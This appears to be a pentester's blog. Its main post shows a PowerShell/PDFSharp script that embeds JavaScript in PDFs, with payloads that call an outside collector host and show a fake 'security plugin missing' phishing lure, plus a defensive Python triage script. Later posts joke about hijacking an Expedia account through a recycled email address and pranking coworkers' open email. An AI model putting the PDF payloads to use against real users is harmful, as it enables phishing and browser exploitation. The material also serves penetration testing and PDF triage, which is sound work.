PowerShell

When trying to solve a problem, I try to use PowerShell.

During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:

Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit

Unfortunately, the closest thing was an old Adobe Reader 8.x-vintage embedded EXE exploit. I needed to write a payload into a PDF file that would be *interesting* (such as invoking a web browser). After a PDF API refresher, I decided to build it up from simple pieces. The subset of JavaScript that is available is only really supported in the Adobe readers; your mileage may vary with other readers.

app.launchURL('http://bluenotch.com/collector.php?ver='+app.viewerVersion,true);

After some searching, I found Didier Stevens's work, realizing I should have looked there first. Didier has pdfid.py for summary analysis and mPDF.py to build PDFs. I wanted to go the PowerShell route, however, and all I could find was PDFSharp used in PowerShell print-to-PDF examples. I was surprised that nobody had published something similar to this.

Between a sample PDFSharp cmdlet for merging PDFs (http://mikepfeiffer.net/2010/03/how-to-merge-pdf-files-using-powershell-and-pdfsharp/) and this example of creating JavaScript elements in a PDF from .NET (http://www.vo1dmain.info/pdfsharp-howto-inject-javascript-into-pdf-autoprinting-functionality), I had enough to work out a PowerShell solution. Adobe's JavaScript API specification is also useful for reference (http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.pdf).

A preliminary test script using the ideas above:

param(
    [string]$js = "app.alert('boom goes the reader '+app.reader);",
    [string]$msg = "Hello JS",
    [string]$filename = "C:\PDF\helloJS.pdf"
)

# PDFSharp (WPF build) supplies the PDF object model
Add-Type -Path C:\pdf\PdfSharp-WPF.dll

$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $js
$doc.Info.Creator = "@jimshew"
$page = $doc.AddPage()

# JavaScript action dictionary: /S /JavaScript with the script text in /JS
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName("/JavaScript")
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js)
$doc.Internals.AddObject($dictjs)

# Name tree node: /Names [ (EmbeddedJS) <reference to the action> ]
$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")

$dict.Elements["/Names"] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)

# Hang the name tree off the catalog: /Names << /JavaScript <reference> >>
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements["/JavaScript"] = $dict.Reference
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup

$doc.Save($filename)

On opening the PDF (modern reader, no settings changed):

[screenshot: blogpdfjspopup]

Great, now we can taunt the victim, but what about something more interesting, like making external requests?

$js = "app.alert('Security Plugin Missing, Launching installer');app.launchURL('http://bluenotch.com/pwn.php',true);"
$msg = "Security Plugin FAIL"
$filename = "C:\PDF\helloHTTP.pdf"

[screenshot: blogpdfjspluginwarning]

Followed by:

[screenshot: blogpdfredirectallow]

So it’s easy to see how we can leverage this in a phishing or social engineering attack. In one of the recent assessments, the web portal that housed the PDFs was whitelisted so it didn’t even prompt for the URL redirect! Now it’s ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.

I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see work by Frédérick Raynal and Guillaume Delugré below).

I’ll be turning this into a proper PowerShell module soon (assuming my battery holds out during the next series of flights). For more info on PDF hijinks, you may want to check out:

Origami – a framework for generating malicious PDFs:
http://www.security-labs.org/fred/docs/pacsec08/pacsec08-fr-gd-full.pdf
https://code.google.com/p/origami-pdf/

Online PDF analyzer:
http://wepawet.iseclab.org/index.php

You probably want to check which app.launchURL destinations are already allowed; here is mine after checking the remember box on HelloHTTP.pdf:

[HKEY_USERS\S-1-5-21-3430783995-1949563973-3828160469-1001\Software\Adobe\Acrobat Reader\11.0\TrustManager\cDefaultLaunchURLPerms]

"tHostPerms"="version:2|akeo.ie:2|amazon.com:2|bluenotch.com:2|cdw.com:2|crucial.com:2"
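A defender-side counterpart to the generator above, added here as an example (it is not the post's code, nor PDFSharp's or pdfid.py's): a pdfid-style triage pass in Python that counts the action keywords in a PDF laid out the way the script above lays it out, resolves the #xx name escapes that can hide those keywords, pulls the /JS text back out (following the indirect string object that PdfStringObject writes), lists the literal app.launchURL destinations found in it, and parses the tHostPerms value from the registry export above so the remembered hosts can be reviewed. The sample PDF bytes, the example.invalid URL and the function names are constructed for this example; the tHostPerms value is the one from the export above, and nothing is assumed about its numeric codes beyond the post's own observation that the host it allowed is stored as 2.

```python
import re

# Keywords a pdfid-style pass counts: /JS, /JavaScript (scripts), /OpenAction,
# /AA (auto-triggered actions), /Launch, /URI, /SubmitForm (reach outside the
# reader), /Names (the tree the post's PDFSharp script hangs its script on).
SUSPICIOUS_KEYWORDS = ("/JS", "/JavaScript", "/OpenAction", "/AA", "/Launch",
                       "/URI", "/SubmitForm", "/Names", "/EmbeddedFile")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
NAME_END = rb"(?=[\s/\[\]<>(){}%]|$)"  # a name token ends at a delimiter
LAUNCH_URL = re.compile(r"launchURL\s*\(\s*['\"]([^'\"]*)", re.IGNORECASE)


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes so /J#53 counts as /JS (whole-file; fine for triage)."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_keywords(data: bytes) -> dict:
    """{keyword: occurrences} over the escape-normalized file."""
    text = normalize_names(data)
    return {kw: len(re.findall(re.escape(kw.encode()) + NAME_END, text))
            for kw in SUSPICIOUS_KEYWORDS}


def read_literal_string(text: bytes, start: int) -> bytes:
    """PDF literal string whose '(' is at text[start]; balanced parens are part
    of it, a backslash keeps the next byte verbatim (\\n is not translated)."""
    depth, out, i = 0, bytearray(), start
    while i < len(text):
        c = text[i:i + 1]
        if c == b"\\":
            out += text[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        out += c
        i += 1
    return bytes(out)


def extract_javascript(data: bytes) -> list:
    """/JS values given as literal or hex strings, inline or via an indirect
    string object (what PdfStringObject writes). Compressed streams: not inflated."""
    text = normalize_names(data)
    scripts = []
    for m in re.finditer(rb"/JS" + NAME_END + rb"\s*", text):
        pos = m.end()
        ref = re.match(rb"(\d+)\s+(\d+)\s+R", text[pos:pos + 32])
        if ref:  # follow "n g R" to the "n g obj" it points at
            obj = re.search(rb"(?<!\d)" + ref.group(1) + rb"\s+" + ref.group(2) + rb"\s+obj\s*", text)
            if not obj:
                continue
            pos = obj.end()
        if text[pos:pos + 1] == b"(":
            scripts.append(read_literal_string(text, pos).decode("latin-1"))
        elif text[pos:pos + 1] == b"<" and text[pos:pos + 2] != b"<<":
            hexdigits = re.sub(rb"\s", b"", text[pos + 1:text.find(b">", pos)])
            hexdigits += b"0" * (len(hexdigits) % 2)  # PDF pads an odd digit count
            scripts.append(bytes.fromhex(hexdigits.decode("ascii")).decode("latin-1"))
    return scripts


def find_launch_urls(scripts: list) -> list:
    """Literal URL prefixes passed to app.launchURL (any capitalization); a
    concatenation like '...?ver=' + app.viewerVersion yields its literal prefix."""
    return [u for s in scripts for u in LAUNCH_URL.findall(s)]


def parse_host_perms(value: str) -> tuple:
    """Split the tHostPerms value 'version:2|host:code|...' into (version,
    {host: code}). The post's own remembered allow is stored as 2; other codes
    are not interpreted here."""
    version, hosts = None, {}
    for entry in value.split("|"):
        key, _, code = entry.partition(":")
        if key == "version":
            version = int(code)
        elif key:
            hosts[key] = int(code)
    return version, hosts


# Constructed sample, not a real file: the layout the post's PDFSharp script
# emits (Catalog /Names -> name tree -> action dict -> indirect string), with
# two names hex-escaped. It has no xref table and is not meant to be opened.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Names << /JavaScript 4 0 R >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Names [(EmbeddedJS) 5 0 R] >> endobj
5 0 obj << /S /Jav#61Script /J#53 6 0 R >> endobj
6 0 obj (app.alert('sample'); app.launchURL('http://example.invalid/c.php?v=' + app.viewerVersion, true);) endobj
trailer << /Root 1 0 R >>
%%EOF
"""
# The tHostPerms value from the registry export above in the post.
SAMPLE_HOST_PERMS = "version:2|akeo.ie:2|amazon.com:2|bluenotch.com:2|cdw.com:2|crucial.com:2"

if __name__ == "__main__":
    found = extract_javascript(SAMPLE_PDF)
    print(count_keywords(SAMPLE_PDF), found, find_launch_urls(found),
          parse_host_perms(SAMPLE_HOST_PERMS), sep="\n")
```

Run as a script it prints the four results for the embedded sample; for real triage, pass the bytes of a file to the same functions. Object streams and compressed /JS streams are not inflated, so a zero count is not a clean bill of health; pdfid.py, mentioned in the post, is the tool to reach for when the quick pass is inconclusive.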

+ | jimshew |

Summer of 1999

[image: fire exit]

I was living in southern Idaho back then, which meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie and quickly headed to full time work there.  Yes, hours of fun, shows, tours, etc. But still needed California vacation time. So yes, 60-80 hours a week in a closet size studio and the need to visit my home, Southern California was a priority. Granted Idaho has great white water rivers and white powder snow capped mountains, but still – surf, sand, and retail sunshine were missing.

The gateway medium?  Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet.  So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger – IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999, okay so not everyone had Hotmail yet – mostly Yahoo or AOL and Microsoft recently acquired Hotmail.  I still had a difficult time getting my third choice account name.  So brainbending – one simple combo was available! Full first name and last initial. Two minutes later done registering to welcome email arrives. Step two – I start to book Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well despite me not caring about the why it was a registered email user account < look, I had late nights, not yet a daily straight up espresso drinker, and really did not think much of it. It was highly likely and logical that I started an account process and forgot to finish one late night > I waited – The Password emailed to me… Some vacationy type password. Again, highly likely I made it that password – no red flag. Odd right? But true. The password was five characters long. High Five.  I  think about a month later, I forgot the password … Reset and added a “1” Good job? Yes this means more out of town trips were booked. 

A couple months later I get an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much >  And I think we even might have mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name and he emailed me several years back again just to say hi … Ahem or try to get his email back.  I just looked him up on LinkedIn – Senior Infosec Engineer, now lives in Utah.  Look it was free Risk-game type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.”  + | shew | 

[image: restauration beire]

Same year, same station, different channel role – It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest. Or a claim that their password was weak and they should change it …+ | jimshew |

Cybersecurity thoughts on Presidents’ Day

In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI).  Recently, the Obama Administration released several notices on cybersecurity; one of them, an Executive Order, is quoted below.

By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows: 

Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.

Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari

It is of note that at this White House Summit, held at Stanford University, the CEOs of Google, Yahoo and Facebook were absent. Tim Cook, Apple’s CEO, attended.

[image: Americano Latte]

SMALL TALK  On a coffee + laptop observational side note:  I was at a coffeebar on Saturday and there were only Macs everywhere.  Yes, I did the 360 check while waiting for my Americano-latte.  It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which can we agree we love / hate the emailed receipt?!).  So apparently, if I bring my ThinkPad, I might need to trek down to the other coffeeshop down the street – they use an older school Point of Sale system and have the most amazing hazelnut gelato.  + | shew |

Five Year Plan

SMALL TALK    I’m working on my five year plan, just trying to figure out the font.  < that’s a line in the pilot episode of Chuck >  I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad).   +  | shew |

[image: fiveyearplan]

Since we’re on a television tangent … Just saw the ESXi console on Blacklist, now I *know* it’s a documentary. + | james.shew |

Welcome

[image: stumptown at sidecar]

NERD TALK  requires more espresso.  And since it’s late, ahem early am and we are up wrestling technical fun time warps, I’ll save my eloquent thoughts for the mid morning first jumpstart shot of caffeine.  Thank you Sidecar, Stumptown, Rose Park, and even in the pinch, Starbucks for the assists.

+  | shew |

UPDATE 15.48 |  A Nice SRP Circumventing Trick | During a recent penetration test, my goal was to smuggle data out of a hardened virtual application.  This particular test included a vApp designed to restrict everything not needed to display and edit a Word document.  Between Group Policy Objects and Software Restriction Policies, there were practically no third-party applications available to manipulate, and most Windows internal programs were either removed or hijacked by a Digital Rights Management DLL.
